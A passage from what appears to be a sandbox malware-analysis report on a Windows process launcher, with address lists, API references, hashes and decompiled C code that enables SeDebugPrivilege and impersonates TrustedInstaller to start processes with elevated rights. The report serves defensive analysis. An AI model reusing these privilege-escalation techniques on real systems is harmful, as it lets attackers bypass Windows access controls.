                                                                                                  0x004024f0
                                                                                                  0x00402506
                                                                                                  0x0040250b
                                                                                                  0x00402512
                                                                                                  0x00402518
                                                                                                  0x00402519
                                                                                                  0x0040251e
                                                                                                  0x00402524
                                                                                                  0x00402527
                                                                                                  0x0040252b
                                                                                                  0x00402530
                                                                                                  0x00402531
                                                                                                  0x00402531
                                                                                                  0x0040253d
                                                                                                  0x0040255a
                                                                                                  0x00402561
                                                                                                  0x00402570
                                                                                                  0x00402574
                                                                                                  0x00402590
                                                                                                  0x00402593
                                                                                                  0x004025a9
                                                                                                  0x004025ae
                                                                                                  0x004025b5
                                                                                                  0x004025bb
                                                                                                  0x004025bc
                                                                                                  0x004025c1
                                                                                                  0x004025c7
                                                                                                  0x004025ca
                                                                                                  0x004025cd
                                                                                                  0x004025ce
                                                                                                  0x004025d4
                                                                                                  0x004025d4
                                                                                                  0x004025da
                                                                                                  0x004025e3
                                                                                                  0x004025eb
                                                                                                  0x00402633
                                                                                                  0x004025fb
                                                                                                  0x00402608
                                                                                                  0x0040260f
                                                                                                  0x00402614
                                                                                                  0x00402624
                                                                                                  0x00402630
                                                                                                  0x00402630
                                                                                                  0x0040263a
                                                                                                  0x0040263b
                                                                                                  0x00402646
                                                                                                  0x0040264b
                                                                                                  0x0040264c
                                                                                                  0x0040265a
                                                                                                  0x0040265a
                                                                                                  0x0040265d
                                                                                                  0x00402666
                                                                                                  0x00402668
                                                                                                  0x00402668
                                                                                                  0x00402672
                                                                                                  0x00402675
                                                                                                  0x0040267e
                                                                                                  0x0040267e
                                                                                                  0x00402683
                                                                                                  0x0040268b
                                                                                                  0x0040269e
                                                                                                  0x0040269e
                                                                                                  0x004026a3
                                                                                                  0x004026ac
                                                                                                  0x004026b5
                                                                                                  0x004026b8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004026ba
                                                                                                  0x00000000
                                                                                                  0x004026ae
                                                                                                  0x004026ae
                                                                                                  0x004026bf
                                                                                                  0x004026c1
                                                                                                  0x004026c6
                                                                                                  0x004026cc
                                                                                                  0x004026d5
                                                                                                  0x004026db
                                                                                                  0x004026e4
                                                                                                  0x004026ea
                                                                                                  0x004026f3
                                                                                                  0x004026f9
                                                                                                  0x00402707
                                                                                                  0x00402707
                                                                                                  0x0040270d
                                                                                                  0x00402710
                                                                                                  0x0040276d
                                                                                                  0x00402770
                                                                                                  0x0040280b
                                                                                                  0x0040280e
                                                                                                  0x00402813
                                                                                                  0x00402810
                                                                                                  0x00402810
                                                                                                  0x00402810
                                                                                                  0x00402819
                                                                                                  0x0040281f
                                                                                                  0x00402836
                                                                                                  0x00402841
                                                                                                  0x00402846
                                                                                                  0x0040284a
                                                                                                  0x00402851
                                                                                                  0x00402857
                                                                                                  0x00402860
                                                                                                  0x00402865
                                                                                                  0x00402876
                                                                                                  0x00402879
                                                                                                  0x00402888
                                                                                                  0x00402888
                                                                                                  0x00402857
                                                                                                  0x00402891
                                                                                                  0x0040289c
                                                                                                  0x0040289c
                                                                                                  0x00402779
                                                                                                  0x00402784
                                                                                                  0x0040278d
                                                                                                  0x004027a4
                                                                                                  0x004027b3
                                                                                                  0x004027b8
                                                                                                  0x004027bb
                                                                                                  0x004027bf
                                                                                                  0x004027c6
                                                                                                  0x004027c6
                                                                                                  0x004027d1
                                                                                                  0x004027d6
                                                                                                  0x004027d9
                                                                                                  0x004027db
                                                                                                  0x004027e2
                                                                                                  0x004027e4
                                                                                                  0x004027e4
                                                                                                  0x004027e7
                                                                                                  0x004027f4
                                                                                                  0x004027fc
                                                                                                  0x00402801
                                                                                                  0x00402801
                                                                                                  0x00402803
                                                                                                  0x00402803
                                                                                                  0x00402806
                                                                                                  0x00000000
                                                                                                  0x00402806
                                                                                                  0x00402715
                                                                                                  0x00402729
                                                                                                  0x0040272e
                                                                                                  0x00402731
                                                                                                  0x00402738
                                                                                                  0x00402738
                                                                                                  0x00402743
                                                                                                  0x00402748
                                                                                                  0x0040274d
                                                                                                  0x00402754
                                                                                                  0x00402756
                                                                                                  0x00402756
                                                                                                  0x00402759
                                                                                                  0x00402763
                                                                                                  0x00000000
                                                                                                  0x00402763
                                                                                                  0x004026fb
                                                                                                  0x00402700
                                                                                                  0x00402702
                                                                                                  0x00000000
                                                                                                  0x00402702
                                                                                                  0x004026ec
                                                                                                  0x00000000
                                                                                                  0x004026ec
                                                                                                  0x004026dd
                                                                                                  0x00000000
                                                                                                  0x004026dd
                                                                                                  0x004026ce
                                                                                                  0x00000000
                                                                                                  0x004026ce
                                                                                                  0x004026ac
                                                                                                  0x00402443
                                                                                                  0x0040246a
                                                                                                  0x00402470
                                                                                                  0x00000000
                                                                                                  0x00402470

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00402300
                                                                                                  • memset.MSVCRT ref: 0040233E
                                                                                                  • memset.MSVCRT ref: 00402356
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                  • wcschr.MSVCRT ref: 00402387
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                                                  • memset.MSVCRT ref: 004023D9
                                                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                  • memset.MSVCRT ref: 004024BE
                                                                                                  • memset.MSVCRT ref: 004024D1
                                                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                                                  • memset.MSVCRT ref: 00402561
                                                                                                  • memset.MSVCRT ref: 00402574
                                                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                                                  • memset.MSVCRT ref: 0040260F
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                  • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                  • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                  • API String ID: 2452314994-435178042
                                                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 89%
                                                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                  				char _v0;
                                                                                                  				WCHAR* _v4;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t76;
                                                                                                  				void* _t82;
                                                                                                  				wchar_t* _t85;
                                                                                                  				void* _t86;
                                                                                                  				void* _t87;
                                                                                                  				intOrPtr _t92;
                                                                                                  				wchar_t* _t93;
                                                                                                  				intOrPtr _t95;
                                                                                                  				int _t106;
                                                                                                  				char* _t110;
                                                                                                  				intOrPtr _t115;
                                                                                                  				wchar_t* _t117;
                                                                                                  				intOrPtr _t124;
                                                                                                  				wchar_t* _t125;
                                                                                                  				intOrPtr _t131;
                                                                                                  				wchar_t* _t132;
                                                                                                  				int _t156;
                                                                                                  				void* _t159;
                                                                                                  				intOrPtr _t162;
                                                                                                  				void* _t177;
                                                                                                  				void* _t178;
                                                                                                  				void* _t179;
                                                                                                  				intOrPtr _t181;
                                                                                                  				int _t187;
                                                                                                  				intOrPtr _t188;
                                                                                                  				intOrPtr _t190;
                                                                                                  				intOrPtr _t198;
                                                                                                  				signed int _t205;
                                                                                                  				signed int _t206;
                                                                                                  
                                                                                                  				_t179 = __edx;
                                                                                                  				_t158 = __ecx;
                                                                                                  				_t206 = _t205 & 0xfffffff8;
                                                                                                  				E0040B550(0x1ccc, __ecx);
                                                                                                  				_t76 = E0040313D(_t158);
                                                                                                  				if(_t76 != 0) {
                                                                                                  					E0040AC52();
                                                                                                  					SetErrorMode(0x8001); // executed
                                                                                                  					_t156 = 0;
                                                                                                  					 *0x40fa70 = 0x11223344;
                                                                                                  					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                  					_t82 = E00405497( &_a8);
                                                                                                  					_a48 = 0x20;
                                                                                                  					_a40 = 0;
                                                                                                  					_a52 = 0;
                                                                                                  					_a44 = 0;
                                                                                                  					_a56 = 0;
                                                                                                  					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                                  					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                  					 *_t206 = L"/SpecialRun";
                                                                                                  					_t85 = E0040585C( &_v0);
                                                                                                  					__eflags = _t85;
                                                                                                  					if(_t85 != 0) {
                                                                                                  						L8:
                                                                                                  						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                  						__eflags = _t86 - _t156;
                                                                                                  						if(_t86 < _t156) {
                                                                                                  							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                  							__eflags = _t87 - _t156;
                                                                                                  							if(_t87 >= _t156) {
                                                                                                  								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                  								_t41 = _t87 + 1; // 0x1
                                                                                                  								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                  								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                  								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                  								__eflags = _t117;
                                                                                                  								if(_t117 == 0) {
                                                                                                  									_a92 = _t156;
                                                                                                  									memset( &_a94, _t156, 0x208);
                                                                                                  									_a620 = _t156;
                                                                                                  									memset( &_a622, _t156, 0x208);
                                                                                                  									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                  									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                  									_t125 = _t124 + 0x5504;
                                                                                                  									_v4 = _t125;
                                                                                                  									_t187 = wcslen(_t125);
                                                                                                  									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                  									__eflags = _t187 + _t51 - 0x104;
                                                                                                  									if(_t187 + _t51 >= 0x104) {
                                                                                                  										_a620 = _t156;
                                                                                                  									} else {
                                                                                                  										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                  									}
                                                                                                  									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                  									_t132 = _t131 + 0x5504;
                                                                                                  									__eflags = _t132;
                                                                                                  									wcscpy(_t132,  &_a620);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							E00402F31(_t156);
                                                                                                  							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                  							_pop(_t159);
                                                                                                  							_a84 =  &_a8;
                                                                                                  							_a76 = 0x40cb0c;
                                                                                                  							_a88 = _t156;
                                                                                                  							_a80 = _t156;
                                                                                                  							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                  							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                  							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                  							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                  								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                  								__eflags = _t93;
                                                                                                  								if(_t93 < 0) {
                                                                                                  									E00406420();
                                                                                                  									__imp__CoInitialize(_t156);
                                                                                                  									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                  									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                  									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                  									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                  									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                  									E00402F31(1);
                                                                                                  									__imp__CoUninitialize();
                                                                                                  								} else {
                                                                                                  									E004065BE(_t159);
                                                                                                  								}
                                                                                                  								goto L7;
                                                                                                  							} else {
                                                                                                  								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                  								_a7356 = _t156;
                                                                                                  								_a7352 = _t156;
                                                                                                  								_a7340 = _t156;
                                                                                                  								_a7344 = _t156;
                                                                                                  								_a7348 = _t156;
                                                                                                  								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                  								_t110 =  &_a5288;
                                                                                                  								L6:
                                                                                                  								E004035FB(_t110);
                                                                                                  								L7:
                                                                                                  								E004054B9( &_v0);
                                                                                                  								E004099D4( &_a32);
                                                                                                  								E004054B9( &_v0);
                                                                                                  								_t106 = _t156;
                                                                                                  								goto L2;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t26 = _t86 + 1; // 0x1
                                                                                                  						_t173 = _t26;
                                                                                                  						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							E00402F31(_t156);
                                                                                                  						} else {
                                                                                                  							E00402FC6(_t173, __eflags, _t138);
                                                                                                  						}
                                                                                                  						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                  						_a68 =  &_a8;
                                                                                                  						_a60 = 0x40cb0c;
                                                                                                  						_a72 = _t156;
                                                                                                  						_a64 = _t156;
                                                                                                  						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                  						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                  						_a5280 = _t156;
                                                                                                  						_a5276 = _t156;
                                                                                                  						_a5264 = _t156;
                                                                                                  						_a5268 = _t156;
                                                                                                  						_a5272 = _t156;
                                                                                                  						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                  						_t110 =  &_a3212;
                                                                                                  						goto L6;
                                                                                                  					}
                                                                                                  					__eflags = _a56 - 3;
                                                                                                  					if(_a56 != 3) {
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  					__eflags = 1;
                                                                                                  					_a3212 = 0;
                                                                                                  					_a3208 = 0;
                                                                                                  					_a3196 = 0;
                                                                                                  					_a3200 = 0;
                                                                                                  					_a3204 = 0;
                                                                                                  					_v4 = 0;
                                                                                                  					_v0 = 0;
                                                                                                  					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                  					_t177 = 2;
                                                                                                  					_push(E0040584C( &_v0, _t177));
                                                                                                  					L0040B1F8();
                                                                                                  					_pop(_t178);
                                                                                                  					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                                  					_t110 =  &_a1132;
                                                                                                  					goto L6;
                                                                                                  				} else {
                                                                                                  					_t106 = _t76 + 1;
                                                                                                  					L2:
                                                                                                  					return _t106;
                                                                                                  				}
                                                                                                  			}




































                                                                                                  0x00408533
                                                                                                  0x00408533
                                                                                                  0x00408536
                                                                                                  0x0040853e
                                                                                                  0x00408546
                                                                                                  0x0040854d
                                                                                                  0x00408559
                                                                                                  0x00408563
                                                                                                  0x00408569
                                                                                                  0x00408572
                                                                                                  0x00408583
                                                                                                  0x0040858d
                                                                                                  0x00408595
                                                                                                  0x0040859e
                                                                                                  0x004085a2
                                                                                                  0x004085a6
                                                                                                  0x004085aa
                                                                                                  0x004085ae
                                                                                                  0x004085b8
                                                                                                  0x004085c1
                                                                                                  0x004085c8
                                                                                                  0x004085cd
                                                                                                  0x004085cf
                                                                                                  0x0040867f
                                                                                                  0x00408688
                                                                                                  0x0040868d
                                                                                                  0x0040868f
                                                                                                  0x00408730
                                                                                                  0x00408735
                                                                                                  0x00408737
                                                                                                  0x0040873d
                                                                                                  0x00408750
                                                                                                  0x0040875d
                                                                                                  0x00408763
                                                                                                  0x00408770
                                                                                                  0x00408775
                                                                                                  0x00408779
                                                                                                  0x0040878b
                                                                                                  0x00408790
                                                                                                  0x004087a2
                                                                                                  0x004087aa
                                                                                                  0x004087b8
                                                                                                  0x004087be
                                                                                                  0x004087c3
                                                                                                  0x004087c9
                                                                                                  0x004087d2
                                                                                                  0x004087df
                                                                                                  0x004087e3
                                                                                                  0x004087e6
                                                                                                  0x00408801
                                                                                                  0x004087e8
                                                                                                  0x004087f8
                                                                                                  0x004087fe
                                                                                                  0x00408811
                                                                                                  0x00408816
                                                                                                  0x00408816
                                                                                                  0x0040881c
                                                                                                  0x00408822
                                                                                                  0x00408779
                                                                                                  0x00408824
                                                                                                  0x00408829
                                                                                                  0x00408833
                                                                                                  0x00408834
                                                                                                  0x00408840
                                                                                                  0x00408848
                                                                                                  0x0040884c
                                                                                                  0x00408850
                                                                                                  0x00408855
                                                                                                  0x0040885a
                                                                                                  0x00408860
                                                                                                  0x004088ac
                                                                                                  0x004088b1
                                                                                                  0x004088b3
                                                                                                  0x004088bf
                                                                                                  0x004088c5
                                                                                                  0x004088cb
                                                                                                  0x004088da
                                                                                                  0x004088ea
                                                                                                  0x004088ed
                                                                                                  0x004088f8
                                                                                                  0x004088ff
                                                                                                  0x00408905
                                                                                                  0x004088b5
                                                                                                  0x004088b5
                                                                                                  0x004088b5
                                                                                                  0x00000000
                                                                                                  0x00408862
                                                                                                  0x00408862
                                                                                                  0x0040886d
                                                                                                  0x00408874
                                                                                                  0x0040887b
                                                                                                  0x00408882
                                                                                                  0x00408889
                                                                                                  0x00408895
                                                                                                  0x00408897
                                                                                                  0x00408658
                                                                                                  0x00408658
                                                                                                  0x0040865d
                                                                                                  0x00408661
                                                                                                  0x0040866a
                                                                                                  0x00408673
                                                                                                  0x00408678
                                                                                                  0x00000000
                                                                                                  0x00408678
                                                                                                  0x00408860
                                                                                                  0x00408695
                                                                                                  0x00408695
                                                                                                  0x0040869f
                                                                                                  0x004086a2
                                                                                                  0x004086af
                                                                                                  0x004086a4
                                                                                                  0x004086a7
                                                                                                  0x004086a7
                                                                                                  0x004086b4
                                                                                                  0x004086bf
                                                                                                  0x004086cb
                                                                                                  0x004086d3
                                                                                                  0x004086d7
                                                                                                  0x004086db
                                                                                                  0x004086e0
                                                                                                  0x004086f1
                                                                                                  0x004086f8
                                                                                                  0x004086ff
                                                                                                  0x00408706
                                                                                                  0x0040870d
                                                                                                  0x00408719
                                                                                                  0x0040871b
                                                                                                  0x00000000
                                                                                                  0x0040871b
                                                                                                  0x004085d5
                                                                                                  0x004085da
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004085ec
                                                                                                  0x004085ef
                                                                                                  0x004085f6
                                                                                                  0x004085fd
                                                                                                  0x00408604
                                                                                                  0x0040860b
                                                                                                  0x00408612
                                                                                                  0x00408616
                                                                                                  0x00408620
                                                                                                  0x0040862a
                                                                                                  0x00408632
                                                                                                  0x00408633
                                                                                                  0x00408638
                                                                                                  0x0040864f
                                                                                                  0x00408651
                                                                                                  0x00000000
                                                                                                  0x0040854f
                                                                                                  0x0040854f
                                                                                                  0x00408550
                                                                                                  0x00408556
                                                                                                  0x00408556

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                  • swscanf.MSVCRT ref: 00408620
                                                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                  • API String ID: 3933224404-3784219877
                                                                                                  • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                  • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 81%
                                                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                  				int _v8;
                                                                                                  				long _v12;
                                                                                                  				wchar_t* _v16;
                                                                                                  				void _v546;
                                                                                                  				long _v548;
                                                                                                  				void _v1074;
                                                                                                  				char _v1076;
                                                                                                  				void* __esi;
                                                                                                  				long _t84;
                                                                                                  				int _t87;
                                                                                                  				wchar_t* _t88;
                                                                                                  				int _t92;
                                                                                                  				void* _t93;
                                                                                                  				int _t94;
                                                                                                  				int _t96;
                                                                                                  				int _t99;
                                                                                                  				int _t104;
                                                                                                  				long _t105;
                                                                                                  				int _t110;
                                                                                                  				void** _t112;
                                                                                                  				int _t113;
                                                                                                  				intOrPtr _t131;
                                                                                                  				wchar_t* _t132;
                                                                                                  				int* _t148;
                                                                                                  				wchar_t* _t149;
                                                                                                  				int _t151;
                                                                                                  				void* _t152;
                                                                                                  				void* _t153;
                                                                                                  				int _t154;
                                                                                                  				void* _t155;
                                                                                                  				long _t160;
                                                                                                  
                                                                                                  				_t145 = __edx;
                                                                                                  				_t152 = __ecx;
                                                                                                  				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                  				_v12 = 0;
                                                                                                  				if(_t131 != 4) {
                                                                                                  					__eflags = _t131 - 5;
                                                                                                  					if(_t131 != 5) {
                                                                                                  						__eflags = _t131 - 9;
                                                                                                  						if(__eflags != 0) {
                                                                                                  							__eflags = _t131 - 8;
                                                                                                  							if(_t131 != 8) {
                                                                                                  								__eflags = _t131 - 6;
                                                                                                  								if(_t131 != 6) {
                                                                                                  									__eflags = _t131 - 7;
                                                                                                  									if(_t131 != 7) {
                                                                                                  										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                  									} else {
                                                                                                  										_t132 = __eax + 0x46b6;
                                                                                                  										_t148 = __eax + 0x48b6;
                                                                                                  										__eflags =  *_t148;
                                                                                                  										_v16 = _t132;
                                                                                                  										_v8 = __eax + 0x4ab6;
                                                                                                  										if( *_t148 == 0) {
                                                                                                  											_t88 = wcschr(_t132, 0x40);
                                                                                                  											__eflags = _t88;
                                                                                                  											if(_t88 != 0) {
                                                                                                  												_t148 = 0;
                                                                                                  												__eflags = 0;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										_t153 = _t152 + 0x800;
                                                                                                  										E0040289F(_t153);
                                                                                                  										_t154 =  *(_t153 + 0xc);
                                                                                                  										__eflags = _t154;
                                                                                                  										if(_t154 == 0) {
                                                                                                  											_t87 = 0;
                                                                                                  											__eflags = 0;
                                                                                                  										} else {
                                                                                                  											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                  										}
                                                                                                  										__eflags = _t87;
                                                                                                  									}
                                                                                                  									if(__eflags == 0) {
                                                                                                  										_t84 = GetLastError();
                                                                                                  										L43:
                                                                                                  										_v12 = _t84;
                                                                                                  									}
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                  								if(__eflags == 0) {
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                  								__eflags = _t92;
                                                                                                  								if(_t92 != 0) {
                                                                                                  									goto L44;
                                                                                                  								}
                                                                                                  								_t84 = _a28;
                                                                                                  								goto L43;
                                                                                                  							}
                                                                                                  							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                  							__eflags = _t93;
                                                                                                  							if(_t93 != 0) {
                                                                                                  								E00401306(_t93); // executed
                                                                                                  							}
                                                                                                  							_v8 = 0;
                                                                                                  							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                  							__eflags = _t94;
                                                                                                  							_v12 = _t94;
                                                                                                  							if(__eflags == 0) {
                                                                                                  								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                  								__eflags = _t96;
                                                                                                  								_v12 = _t96;
                                                                                                  								if(_t96 == 0) {
                                                                                                  									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                  									__eflags = _t99;
                                                                                                  									if(_t99 == 0) {
                                                                                                  										_v12 = GetLastError();
                                                                                                  									}
                                                                                                  									CloseHandle(_v8); // executed
                                                                                                  								}
                                                                                                  								RevertToSelf(); // executed
                                                                                                  							}
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                  						__eflags = _t104;
                                                                                                  						if(_t104 == 0) {
                                                                                                  							goto L44;
                                                                                                  						}
                                                                                                  						_v8 = 0;
                                                                                                  						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  					_t149 = __eax + 0x44ac;
                                                                                                  					_t110 = wcslen(_t149);
                                                                                                  					__eflags = _t110;
                                                                                                  					if(_t110 <= 0) {
                                                                                                  						goto L44;
                                                                                                  					} else {
                                                                                                  						_v8 = 0;
                                                                                                  						__eflags = E00404EA9(_t149, _t110);
                                                                                                  						_t112 =  &_v8;
                                                                                                  						_push(_t112);
                                                                                                  						_push(_t149);
                                                                                                  						if(__eflags == 0) {
                                                                                                  							_push(_t152);
                                                                                                  							_t113 = E00401DF9(_t145, __eflags);
                                                                                                  						} else {
                                                                                                  							L0040B1F8();
                                                                                                  							_push(_t112);
                                                                                                  							_push(_t152);
                                                                                                  							_t113 = E00401E44();
                                                                                                  						}
                                                                                                  						_v12 = _t113;
                                                                                                  						__eflags = _t113;
                                                                                                  						goto L15;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v548 = 0;
                                                                                                  					memset( &_v546, 0, 0x208);
